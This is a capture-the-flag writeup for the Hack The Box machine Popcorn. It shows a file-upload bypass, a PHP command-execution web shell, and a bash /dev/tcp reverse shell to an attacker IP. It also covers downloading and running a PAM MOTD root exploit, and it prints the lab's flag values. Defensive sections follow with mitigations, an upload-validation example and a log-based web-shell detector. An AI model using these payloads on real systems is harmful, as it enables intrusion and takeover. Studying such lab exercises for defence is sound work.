htb-writeups

Popcorn HTB Writeup

Executive Summary

This penetration test of the Popcorn HTB machine revealed critical security vulnerabilities leading to complete system compromise. The attack chain progressed from web application enumeration to remote code execution and privilege escalation.

Reconnaissance Phase

Network Scanning

Target Declaration:

export target=10.129.91.156


Comprehensive Port Discovery:

sudo nmap -p- --min-rate 5000 -sT -vvv $target


Service Enumeration:

sudo nmap -p 22,80 -sC -sV -T4 $target


DNS Configuration

Added hostname resolution for comprehensive web testing:

echo "10.129.91.156 popcorn.htb" | sudo tee -a /etc/hosts


Web Application Assessment

Initial Discovery

Visiting http://popcorn.htb revealed a default web application interface.


Directory Enumeration

Conducted thorough directory bruteforcing which uncovered several interesting endpoints.


Critical Findings

File Upload Functionality:


Initial Access

User Registration

Successfully registered a new account on the torrent application to gain access to upload functionality.


File Upload Bypass

  1. Torrent Upload: Initially uploaded a legitimate torrent file


  2. Image Upload Bypass:
    • Accessed the image editing feature


Remote Code Execution

Shell Upload:

<?php system($_GET['cmd']); ?>


Reverse Shell Execution:

# Attacker Listener
nc -nlvp 9001

# Web Trigger
http://popcorn.htb/torrent/upload/920dcb9268b2e20fbe0f0bd9a4de82188ce28033.php?cmd=bash%20-c%20%27sh%20-i%20%3E%26%20/dev/tcp/10.10.16.21/9001%200%3E%261%27


Shell Obtained:


Post-Exploitation

User Flag Discovery

find . -type f -ls
cat user.txt
475e864a3771cf836c78fa1f6ab4b8f2


Privilege Escalation

Vulnerability Identification:


Exploit Research:


Exploit Deployment:

# Host exploit on attacker machine
python3 -m http.server 8000

# Download and execute on target
wget http://10.10.16.21:8000/14339.sh
chmod +x 14339.sh

# Stabilize shell before execution
python -c "import pty;pty.spawn('/bin/bash')"
./14339.sh


Root Access Achieved

Successfully escalated privileges to root using the PAM MOTD vulnerability.


Root Flag Extraction:


cat /root/root.txt
5eddd59cc9633927984c39f001331eb2

Vulnerability Analysis

Critical Security Issues

  1. Insecure File Upload
    • No proper file type validation
    • Content-Type header manipulation possible
    • Executable files stored in web-accessible directory
  2. Privilege Escalation Vector
    • Outdated PAM version with known vulnerability
    • Improper MOTD configuration
    • Lack of security patches
  3. Access Control Failures
    • Weak upload restrictions
    • Insufficient input sanitization

Mitigation Recommendations

Immediate Actions

  1. File Upload Security
    • Implement strict file type verification
    • Use server-side MIME type detection
    • Store uploaded files outside web root
    • Implement antivirus scanning
  2. System Patching
    • Update PAM to latest secure version
    • Apply all security patches regularly
    • Implement automated patch management
  3. Network Security
    • Restrict file upload capabilities
    • Implement Web Application Firewall (WAF)
    • Conduct regular vulnerability assessments
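The file-upload recommendations above are easier to act on with a concrete check. The following is an added example, not code from the target application or from this writeup: it places the weak check that the writeup bypassed (trusting the client-supplied Content-Type header) next to a hardened check that sniffs the file's leading bytes server-side, enforces an extension allowlist, and lets the server choose the on-disk name under a directory outside the web root. The magic-byte table, the `UPLOAD_ROOT` path and the sample inputs are assumptions constructed for the example.

```python
"""Upload validation: weak header-only check vs. hardened content-based check.
Example code; the allowlist, UPLOAD_ROOT and sample data are constructed."""
import os
import secrets

# Allowed types: canonical extension -> (leading magic bytes, expected MIME type).
# Magic values are simplified; a production detector checks more than the first bytes.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "gif": (b"GIF8", "image/gif"),
    "torrent": (b"d8:announce", "application/x-bittorrent"),
}
UPLOAD_ROOT = "/srv/uploads"  # hypothetical path, deliberately outside the document root


def weak_is_image(content_type: str) -> bool:
    """The kind of check the writeup defeated: the client fully controls this header."""
    return content_type.startswith("image/")


def sniff_type(data: bytes):
    """Server-side detection from the file's own bytes; None if unrecognised."""
    for ext, (magic, _mime) in ALLOWED.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (True, server_chosen_name) or (False, reason)."""
    base = os.path.basename(filename)            # drop any client-supplied path component
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()          # only the LAST extension is considered
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed"
    if sniff_type(data) != ext:                   # "shell.png" holding PHP source fails here
        return False, "content does not match extension"
    if content_type != ALLOWED[ext][1]:           # header must agree with the sniffed type
        return False, "declared Content-Type disagrees with content"
    # The original filename never reaches disk; the extension is the canonical one.
    return True, f"{secrets.token_hex(16)}.{ext}"


def storage_path(stored_name: str) -> str:
    """Final location, outside the web root, so nothing stored there is served as code."""
    return os.path.join(UPLOAD_ROOT, stored_name)


if __name__ == "__main__":
    script = b"<?php echo 'x'; ?>"                        # constructed: script text, not an image
    print(weak_is_image("image/png"))                     # True: the header alone is trusted
    print(validate_upload("shell.php", "image/png", script))   # rejected: extension not allowed
    print(validate_upload("shell.png", "image/png", script))   # rejected: content mismatch
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16             # constructed minimal PNG header
    ok, name = validate_upload("cat.png", "image/png", png)
    print(ok, storage_path(name))                         # accepted under a random name
```

The hardened path refuses a file on any disagreement between extension, sniffed content and declared type, and never reuses the client's filename, so a double extension or a renamed script cannot land as an executable in a served directory. A polyglot (a valid image that also contains script text) still passes the sniff, which is why the storage location outside the web root and a web-server rule that never executes files from the upload directory remain part of the fix rather than optional extras.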

Long-term Security Improvements

  1. Secure Development Practices
    • Input validation and sanitization
    • Principle of least privilege
    • Regular security code reviews
  2. Monitoring and Detection
    • File integrity monitoring
    • Intrusion detection systems
    • Comprehensive logging and alerting
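As an illustration of the logging and alerting item, the following is an added example that is not part of the writeup or of the target system: it scans Apache combined-format access-log lines for script files being requested under an upload directory and for command-style query parameters, which is exactly the traffic pattern the compromise above would have produced. The log lines are constructed samples (the upload path is the one the writeup names), and the parameter-name list is an assumption to be extended per application.

```python
"""Access-log detection for web-shell use under an upload directory.
Example code; SAMPLE_LOG lines and COMMAND_PARAMS are constructed assumptions."""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_PREFIXES = ("/torrent/upload/",)                  # upload path named in the writeup
SCRIPT_EXTS = (".php", ".phtml", ".php3", ".php5", ".phar")
COMMAND_PARAMS = {"cmd", "exec", "command", "c"}          # assumed names; tune per app

# Constructed sample log: one benign image fetch, one script invocation with a
# command parameter (the filename is the one the writeup shows), one normal page
# view, and one failed attempt to reach a script under the upload path.
SAMPLE_LOG = """\
10.10.16.21 - - [10/Jan/2024:10:00:01 +0000] "GET /torrent/upload/abc123.png HTTP/1.1" 200 5120
10.10.16.21 - - [10/Jan/2024:10:00:05 +0000] "GET /torrent/upload/920dcb9268b2e20fbe0f0bd9a4de82188ce28033.php?cmd=id HTTP/1.1" 200 57
10.10.16.21 - - [10/Jan/2024:10:00:09 +0000] "GET /torrent/index.php HTTP/1.1" 200 3210
10.10.16.21 - - [10/Jan/2024:10:00:12 +0000] "GET /torrent/upload/abc123.php HTTP/1.1" 404 290
"""


def parse_line(line: str):
    """Parse one combined-format line into a dict; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    parts = urlsplit(ev["target"])
    ev["path"] = parts.path
    ev["params"] = parse_qs(parts.query)
    return ev


def reasons_for(ev: dict) -> list:
    """Why this request looks like web-shell activity (empty list means benign)."""
    reasons = []
    path = ev["path"].lower()
    if path.startswith(UPLOAD_PREFIXES) and path.endswith(SCRIPT_EXTS):
        reasons.append("script requested under upload path")
        if ev["status"] == "200":
            reasons.append("server executed/served it (HTTP 200)")
    if COMMAND_PARAMS & set(ev["params"]):
        reasons.append("command-style query parameter")
    return reasons


def scan(log_text: str) -> list:
    """Return [(ip, path, reasons)] for every suspicious request, in log order."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and (reasons := reasons_for(ev)):
            alerts.append((ev["ip"], ev["path"], reasons))
    return alerts


if __name__ == "__main__":
    for ip, path, reasons in scan(SAMPLE_LOG):
        print(ip, path, "; ".join(reasons))
```

Both the successful invocation and the 404 attempt are reported, because a script name being probed under an upload path is worth an alert even before it succeeds. On the server side this pairs with a directory rule that refuses to execute anything under the upload path (for mod_php, `php_admin_flag engine off` in that directory block), so that a 200 on a `.php` request there becomes impossible rather than merely detectable.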

Technical Indicators

Attack Timeline

  1. Network reconnaissance
  2. Web application enumeration
  3. Account registration
  4. File upload bypass
  5. Remote code execution
  6. Privilege escalation
  7. Root compromise

Tools Utilized

Exploit References